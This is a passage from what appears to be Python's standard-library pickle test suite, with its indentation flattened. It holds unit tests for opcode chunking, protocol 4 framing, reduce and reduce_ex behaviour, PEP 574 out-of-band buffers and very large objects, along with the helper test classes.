self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
def test_set_chunking(self):
n = 10 # too small to chunk
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertEqual(num_additems, 1)
n = 2500 # expect at least two chunks when proto >= 4
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertGreaterEqual(num_additems, 2)
def test_simple_newobj(self):
x = SimpleNewObj.__new__(SimpleNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
else:
self.assertIn(b'M\xce\xfa', s) # BININT2
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj(self):
x = ComplexNewObj.__new__(ComplexNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj_ex(self):
x = ComplexNewObjEx.__new__(ComplexNewObjEx, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ, s))
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ_EX, s),
4 <= proto)
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
@no_tracing
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
def test_bad_getattr(self):
# Issue #3514: crash when there is an infinite loop in __getattr__
x = BadGetattr()
for proto in protocols:
self.assertRaises(RuntimeError, self.dumps, x, proto)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
# Python implementation is less strict and also accepts iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except pickle.PicklingError:
pass
try:
self.dumps(D(), proto)
except pickle.PicklingError:
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
with self.subTest(proto=proto):
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assert_is_copy(obj, loaded)
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA_XRANGE)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA_SET2)
def test_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
for proto in protocols:
data = (1, min, b'xy' * (30 * 1024), len)
dumped = self.dumps(data, proto)
loaded = self.loads(dumped)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_int_pickling_efficiency(self):
# Test compacity of int representation (see issue #12744)
for proto in protocols:
with self.subTest(proto=proto):
pickles = [self.dumps(2**n, proto) for n in range(70)]
sizes = list(map(len, pickles))
# the size function is monotonic
self.assertEqual(sorted(sizes), sizes)
if proto >= 2:
for p in pickles:
self.assertFalse(opcode_in_pickle(pickle.LONG, p))
def _check_pickling_with_opcode(self, obj, opcode, proto):
pickled = self.dumps(obj, proto)
self.assertTrue(opcode_in_pickle(opcode, pickled))
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
def test_appends_on_non_lists(self):
# Issue #17720
obj = REX_six([1, 2, 3])
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.APPEND, proto)
else:
self._check_pickling_with_opcode(obj, pickle.APPENDS, proto)
def test_setitems_on_non_dicts(self):
obj = REX_seven({1: -1, 2: -2, 3: -3})
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.SETITEM, proto)
else:
self._check_pickling_with_opcode(obj, pickle.SETITEMS, proto)
# Exercise framing (proto >= 4) for significant workloads
FRAME_SIZE_MIN = 4
FRAME_SIZE_TARGET = 64 * 1024
def check_frame_opcodes(self, pickled):
"""
Check the arguments of FRAME opcodes in a protocol 4+ pickle.
Note that binary objects that are larger than FRAME_SIZE_TARGET are not
framed by default and are therefore considered a frame by themselves in
the following consistency check.
"""
frame_end = frameless_start = None
frameless_opcodes = {'BINBYTES', 'BINUNICODE', 'BINBYTES8',
'BINUNICODE8', 'BYTEARRAY8'}
for op, arg, pos in pickletools.genops(pickled):
if frame_end is not None:
self.assertLessEqual(pos, frame_end)
if pos == frame_end:
frame_end = None
if frame_end is not None: # framed
self.assertNotEqual(op.name, 'FRAME')
if op.name in frameless_opcodes:
# Only short bytes and str objects should be written
# in a frame
self.assertLessEqual(len(arg), self.FRAME_SIZE_TARGET)
else: # not framed
if (op.name == 'FRAME' or
(op.name in frameless_opcodes and
len(arg) > self.FRAME_SIZE_TARGET)):
# Frame or large bytes or str object
if frameless_start is not None:
# Only short data should be written outside of a frame
self.assertLess(pos - frameless_start,
self.FRAME_SIZE_MIN)
frameless_start = None
elif frameless_start is None and op.name != 'PROTO':
frameless_start = pos
if op.name == 'FRAME':
self.assertGreaterEqual(arg, self.FRAME_SIZE_MIN)
frame_end = pos + 9 + arg
pos = len(pickled)
if frame_end is not None:
self.assertEqual(frame_end, pos)
elif frameless_start is not None:
self.assertLess(pos - frameless_start, self.FRAME_SIZE_MIN)
@support.skip_if_pgo_task
def test_framing_many_objects(self):
obj = list(range(10**5))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
pickled = self.dumps(obj, proto)
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
bytes_per_frame = (len(pickled) /
count_opcode(pickle.FRAME, pickled))
self.assertGreater(bytes_per_frame,
self.FRAME_SIZE_TARGET / 2)
self.assertLessEqual(bytes_per_frame,
self.FRAME_SIZE_TARGET * 1)
self.check_frame_opcodes(pickled)
def test_framing_large_objects(self):
N = 1024 * 1024
small_items = [[i] for i in range(10)]
obj = [b'x' * N, *small_items, b'y' * N, 'z' * N]
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for fast in [False, True]:
with self.subTest(proto=proto, fast=fast):
if not fast:
# fast=False by default.
# This covers in-memory pickling with pickle.dumps().
pickled = self.dumps(obj, proto)
else:
# Pickler is required when fast=True.
if not hasattr(self, 'pickler'):
continue
buf = io.BytesIO()
pickler = self.pickler(buf, protocol=proto)
pickler.fast = fast
pickler.dump(obj)
pickled = buf.getvalue()
unpickled = self.loads(pickled)
# More informative error message in case of failure.
self.assertEqual([len(x) for x in obj],
[len(x) for x in unpickled])
# Perform full equality check if the lengths match.
self.assertEqual(obj, unpickled)
n_frames = count_opcode(pickle.FRAME, pickled)
# A single frame for small objects between
# first two large objects.
self.assertEqual(n_frames, 1)
self.check_frame_opcodes(pickled)
def test_optional_frames(self):
if pickle.HIGHEST_PROTOCOL < 4:
return
def remove_frames(pickled, keep_frame=None):
"""Remove frame opcodes from the given pickle."""
frame_starts = []
# 1 byte for the opcode and 8 for the argument
frame_opcode_size = 9
for opcode, _, pos in pickletools.genops(pickled):
if opcode.name == 'FRAME':
frame_starts.append(pos)
newpickle = bytearray()
last_frame_end = 0
for i, pos in enumerate(frame_starts):
if keep_frame and keep_frame(i):
continue
newpickle += pickled[last_frame_end:pos]
last_frame_end = pos + frame_opcode_size
newpickle += pickled[last_frame_end:]
return newpickle
frame_size = self.FRAME_SIZE_TARGET
num_frames = 20
# Large byte objects (dict values) intermittent with small objects
# (dict keys)
for bytes_type in (bytes, bytearray):
obj = {i: bytes_type([i]) * frame_size for i in range(num_frames)}
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
pickled = self.dumps(obj, proto)
frameless_pickle = remove_frames(pickled)
self.assertEqual(count_opcode(pickle.FRAME, frameless_pickle), 0)
self.assertEqual(obj, self.loads(frameless_pickle))
some_frames_pickle = remove_frames(pickled, lambda i: i % 2)
self.assertLess(count_opcode(pickle.FRAME, some_frames_pickle),
count_opcode(pickle.FRAME, pickled))
self.assertEqual(obj, self.loads(some_frames_pickle))
@support.skip_if_pgo_task
def test_framed_write_sizes_with_delayed_writer(self):
class ChunkAccumulator:
"""Accumulate pickler output in a list of raw chunks."""
def __init__(self):
self.chunks = []
def write(self, chunk):
self.chunks.append(chunk)
def concatenate_chunks(self):
return b"".join(self.chunks)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
objects = [(str(i).encode('ascii'), i % 42, {'i': str(i)})
for i in range(int(1e4))]
# Add a large unique ASCII string
objects.append('0123456789abcdef' *
(self.FRAME_SIZE_TARGET // 16 + 1))
# Protocol 4 packs groups of small objects into frames and issues
# calls to write only once or twice per frame:
# The C pickler issues one call to write per-frame (header and
# contents) while Python pickler issues two calls to write: one for
# the frame header and one for the frame binary contents.
writer = ChunkAccumulator()
self.pickler(writer, proto).dump(objects)
# Actually read the binary content of the chunks after the end
# of the call to dump: any memoryview passed to write should not
# be released otherwise this delayed access would not be possible.
pickled = writer.concatenate_chunks()
reconstructed = self.loads(pickled)
self.assertEqual(reconstructed, objects)
self.assertGreater(len(writer.chunks), 1)
# memoryviews should own the memory.
del objects
support.gc_collect()
self.assertEqual(writer.concatenate_chunks(), pickled)
n_frames = (len(pickled) - 1) // self.FRAME_SIZE_TARGET + 1
# There should be at least one call to write per frame
self.assertGreaterEqual(len(writer.chunks), n_frames)
# but not too many either: there can be one for the proto,
# one per-frame header, one per frame for the actual contents,
# and two for the header.
self.assertLessEqual(len(writer.chunks), 2 * n_frames + 3)
chunk_sizes = [len(c) for c in writer.chunks]
large_sizes = [s for s in chunk_sizes
if s >= self.FRAME_SIZE_TARGET]
medium_sizes = [s for s in chunk_sizes
if 9 < s < self.FRAME_SIZE_TARGET]
small_sizes = [s for s in chunk_sizes if s <= 9]
# Large chunks should not be too large:
for chunk_size in large_sizes:
self.assertLess(chunk_size, 2 * self.FRAME_SIZE_TARGET,
chunk_sizes)
# There shouldn't bee too many small chunks: the protocol header,
# the frame headers and the large string headers are written
# in small chunks.
self.assertLessEqual(len(small_sizes),
len(large_sizes) + len(medium_sizes) + 3,
chunk_sizes)
def test_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(proto=proto, obj=obj):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIs(obj, unpickled)
def test_recursive_nested_names(self):
global Recursive
class Recursive:
pass
Recursive.mod = sys.modules[Recursive.__module__]
Recursive.__qualname__ = 'Recursive.mod.Recursive'
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
unpickled = self.loads(self.dumps(Recursive, proto))
self.assertIs(unpickled, Recursive)
del Recursive.mod # break reference loop
def test_py_methods(self):
global PyMethodsTest
class PyMethodsTest:
@staticmethod
def cheese():
return "cheese"
@classmethod
def wine(cls):
assert cls is PyMethodsTest
return "wine"
def biscuits(self):
assert isinstance(self, PyMethodsTest)
return "biscuits"
class Nested:
"Nested class"
@staticmethod
def ketchup():
return "ketchup"
@classmethod
def maple(cls):
assert cls is PyMethodsTest.Nested
return "maple"
def pie(self):
assert isinstance(self, PyMethodsTest.Nested)
return "pie"
py_methods = (
PyMethodsTest.cheese,
PyMethodsTest.wine,
PyMethodsTest().biscuits,
PyMethodsTest.Nested.ketchup,
PyMethodsTest.Nested.maple,
PyMethodsTest.Nested().pie
)
py_unbound_methods = (
(PyMethodsTest.biscuits, PyMethodsTest),
(PyMethodsTest.Nested.pie, PyMethodsTest.Nested)
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method in py_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(), unpickled())
for method, cls in py_unbound_methods:
obj = cls()
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(obj), unpickled(obj))
def test_c_methods(self):
global Subclass
class Subclass(tuple):
class Nested(str):
pass
c_methods = (
# bound built-in method
("abcd".index, ("c",)),
# unbound built-in method
(str.index, ("abcd", "c")),
# bound "slot" method
([1, 2, 3].__len__, ()),
# unbound "slot" method
(list.__len__, ([1, 2, 3],)),
# bound "coexist" method
({1, 2}.__contains__, (2,)),
# unbound "coexist" method
(set.__contains__, ({1, 2}, 2)),
# built-in class method
(dict.fromkeys, (("a", 1), ("b", 2))),
# built-in static method
(bytearray.maketrans, (b"abc", b"xyz")),
# subclass methods
(Subclass([1,2,2]).count, (2,)),
(Subclass.count, (Subclass([1,2,2]), 2)),
(Subclass.Nested("sweet").count, ("e",)),
(Subclass.Nested.count, (Subclass.Nested("sweet"), "e")),
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method, args in c_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(*args), unpickled(*args))
def test_compat_pickle(self):
tests = [
(range(1, 7), '__builtin__', 'xrange'),
(map(int, '123'), 'itertools', 'imap'),
(functools.reduce, '__builtin__', 'reduce'),
(dbm.whichdb, 'whichdb', 'whichdb'),
(Exception(), 'exceptions', 'Exception'),
(collections.UserDict(), 'UserDict', 'IterableUserDict'),
(collections.UserList(), 'UserList', 'UserList'),
(collections.defaultdict(), 'collections', 'defaultdict'),
]
for val, mod, name in tests:
for proto in range(3):
with self.subTest(type=type(val), proto=proto):
pickled = self.dumps(val, proto)
self.assertIn(('c%s\n%s' % (mod, name)).encode(), pickled)
self.assertIs(type(self.loads(pickled)), type(val))
def test_local_lookup_error(self):
# Test that whichmodule() errors out cleanly when looking up
# an assumed globally-reachable object fails.
def f():
pass
# Since the function is local, lookup will fail
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Same without a __module__ attribute (exercises a different path
# in _pickle.c).
del f.__module__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Yet a different path.
f.__name__ = f.__qualname__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
#
# PEP 574 tests below
#
def buffer_like_objects(self):
# Yield buffer-like objects with the bytestring "abcdef" in them
bytestring = b"abcdefgh"
yield ZeroCopyBytes(bytestring)
yield ZeroCopyBytearray(bytestring)
if _testbuffer is not None:
items = list(bytestring)
value = int.from_bytes(bytestring, byteorder='little')
for flags in (0, _testbuffer.ND_WRITABLE):
# 1-D, contiguous
yield PicklableNDArray(items, format='B', shape=(8,),
flags=flags)
# 2-D, C-contiguous
yield PicklableNDArray(items, format='B', shape=(4, 2),
strides=(2, 1), flags=flags)
# 2-D, Fortran-contiguous
yield PicklableNDArray(items, format='B',
shape=(4, 2), strides=(1, 4),
flags=flags)
def test_in_band_buffers(self):
# Test in-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(obj, proto)
if obj.c_contiguous and proto >= 5:
# The raw memory bytes are serialized in physical order
self.assertIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 0)
if proto >= 5:
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data),
1 if obj.readonly else 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data),
0 if obj.readonly else 1)
# Return a true value from buffer_callback should have
# the same effect
def buffer_callback(obj):
return True
data2 = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertEqual(data2, data)
new = self.loads(data)
# It's a copy
self.assertIsNot(new, obj)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# XXX Unfortunately cannot test non-contiguous array
# (see comment in PicklableNDArray.__reduce_ex__)
def test_oob_buffers(self):
# Test out-of-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
self.dumps(obj, proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = lambda pb: buffers.append(pb.raw())
data = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data), 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data), 0)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 1)
self.assertEqual(count_opcode(pickle.READONLY_BUFFER, data),
1 if obj.readonly else 0)
if obj.c_contiguous:
self.assertEqual(bytes(buffers[0]), b"abcdefgh")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
self.loads(data)
new = self.loads(data, buffers=buffers)
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# Non-sequence buffers accepted too
new = self.loads(data, buffers=iter(buffers))
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_oob_buffers_writable_to_readonly(self):
# Test reconstructing readonly object from writable buffer
obj = ZeroCopyBytes(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(obj, proto, buffer_callback=buffer_callback)
buffers = map(bytearray, buffers)
new = self.loads(data, buffers=buffers)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_picklebuffer_error(self):
# PickleBuffer forbidden with protocol < 5
pb = pickle.PickleBuffer(b"foobar")
for proto in range(0, 5):
with self.assertRaises(pickle.PickleError):
self.dumps(pb, proto)
def test_buffer_callback_error(self):
def buffer_callback(buffers):
1/0
pb = pickle.PickleBuffer(b"foobar")
with self.assertRaises(ZeroDivisionError):
self.dumps(pb, 5, buffer_callback=buffer_callback)
def test_buffers_error(self):
pb = pickle.PickleBuffer(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(pb, proto, buffer_callback=[].append)
# Non iterable buffers
with self.assertRaises(TypeError):
self.loads(data, buffers=object())
# Buffer iterable exhausts too early
with self.assertRaises(pickle.UnpicklingError):
self.loads(data, buffers=[])
def test_inband_accept_default_buffers_argument(self):
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data_pickled = self.dumps(1, proto, buffer_callback=None)
data = self.loads(data_pickled, buffers=None)
@unittest.skipIf(np is None, "Test needs Numpy")
def test_buffers_numpy(self):
def check_no_copy(x, y):
np.testing.assert_equal(x, y)
self.assertEqual(x.ctypes.data, y.ctypes.data)
def check_copy(x, y):
np.testing.assert_equal(x, y)
self.assertNotEqual(x.ctypes.data, y.ctypes.data)
def check_array(arr):
# In-band
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(arr, proto)
new = self.loads(data)
check_copy(arr, new)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffer_callback = lambda _: True
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data)
check_copy(arr, new)
# Out-of-band
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data, buffers=buffers)
if arr.flags.c_contiguous or arr.flags.f_contiguous:
check_no_copy(arr, new)
else:
check_copy(arr, new)
# 1-D
arr = np.arange(6)
check_array(arr)
# 1-D, non-contiguous
check_array(arr[::2])
# 2-D, C-contiguous
arr = np.arange(12).reshape((3, 4))
check_array(arr)
# 2-D, F-contiguous
check_array(arr.T)
# 2-D, non-contiguous
check_array(arr[::2])
class BigmemPickleTests(unittest.TestCase):
# Binary protocols can serialize longs of up to 2 GiB-1
@bigmemtest(size=_2G, memuse=3.6, dry_run=False)
def test_huge_long_32b(self, size):
data = 1 << (8 * size)
try:
for proto in protocols:
if proto < 2:
continue
with self.subTest(proto=proto):
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
finally:
data = None
# Protocol 3 can serialize up to 4 GiB-1 as a bytes object
# (older protocols don't have a dedicated opcode for bytes and are
# too inefficient)
@bigmemtest(size=_2G, memuse=2.5, dry_run=False)
def test_huge_bytes_32b(self, size):
data = b"abcd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES +
struct.pack("<I", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
@bigmemtest(size=_4G, memuse=2.5, dry_run=False)
def test_huge_bytes_64b(self, size):
data = b"acbd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
if proto == 3:
# Protocol 3 does not support large bytes objects.
# Verify that we do not crash when processing one.
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
# All protocols use 1-byte per printable ASCII character; we add another
# byte because the encoded form has to be copied into the internal buffer.
@bigmemtest(size=_2G, memuse=8, dry_run=False)
def test_huge_str_32b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE +
struct.pack("<I", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# BINUNICODE (protocols 1, 2 and 3) cannot carry more than 2**32 - 1 bytes
# of utf-8 encoded unicode. BINUNICODE8 (protocol 4) supports these huge
# unicode strings however.
@bigmemtest(size=_4G, memuse=8, dry_run=False)
def test_huge_str_64b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
if proto < 4:
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# Test classes for reduce_ex
class REX_one(object):
"""No __reduce_ex__ here, but inheriting it from object"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
class REX_two(object):
"""No __reduce__ here, but inheriting it from object"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
"""Calling base class method should succeed"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
class REX_five(object):
"""This one used to fail with infinite recursion"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
class REX_six(object):
"""This class is used to check the 4th argument (list iterator) of
the reduce protocol.
"""
def __init__(self, items=None):
self.items = items if items is not None else []
def __eq__(self, other):
return type(self) is type(other) and self.items == other.items
def append(self, item):
self.items.append(item)
def __reduce__(self):
return type(self), (), None, iter(self.items), None
class REX_seven(object):
"""This class is used to check the 5th argument (dict iterator) of
the reduce protocol.
"""
def __init__(self, table=None):
self.table = table if table is not None else {}
def __eq__(self, other):
return type(self) is type(other) and self.table == other.table
def __setitem__(self, key, value):
self.table[key] = value
def __reduce__(self):
return type(self), (), None, None, iter(self.table.items())
class REX_state(object):
"""This class is used to check the 3th argument (state) of
the reduce protocol.
"""
def __init__(self, state=None):
self.state = state
def __eq__(self, other):
return type(self) is type(other) and self.state == other.state
def __setstate__(self, state):
self.state = state
def __reduce__(self):
return type(self), (), self.state
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(int):
def __init__(self, *args, **kwargs):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
def __eq__(self, other):
return int(self) == int(other) and self.__dict__ == other.__dict__
class ComplexNewObj(SimpleNewObj):
def __getnewargs__(self):
return ('%X' % self, 16)
class ComplexNewObjEx(SimpleNewObj):
def __getnewargs_ex__(self):
return ('%X' % self,), {'base': 16}
class BadGetattr:
def __getattr__(self, key):
self.foo
class AbstractPickleModuleTests(unittest.TestCase):
def test_dump_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
support.unlink(TESTFN)
def test_load_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
support.unlink(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
self.dump(data, stream)
stream.seek(0)
unpickled = self.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 5)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
self.dump(123, f, -1)
